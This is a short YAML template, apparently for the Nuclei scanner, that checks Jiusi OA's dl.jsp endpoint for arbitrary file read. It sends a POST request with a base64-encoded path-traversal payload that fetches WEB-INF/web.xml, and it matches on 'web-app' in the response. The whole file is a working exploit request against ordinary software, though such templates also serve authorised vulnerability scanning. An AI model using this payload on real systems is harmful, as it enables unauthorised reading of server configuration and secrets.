id: jsoa-dl-fileread
info:
  name: 九思OA-dl.jsp-任意文件读取
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://github.com/CRlife/Rscan/commit/7e6b361e2d328ea4623b0baa68767d5e696e8a70
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: demo
    tips:
    repair:
    version:
  tags: jsoa,fileread,oa

http:
  - raw:
      - |
        POST /jsoa/dl.jsp?JkZpbGVOYW1lPS4uLy4uLy4uL1dFQi1JTkYvd2ViLnhtbCZwYXRoPS9h HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'web-app')
        condition: and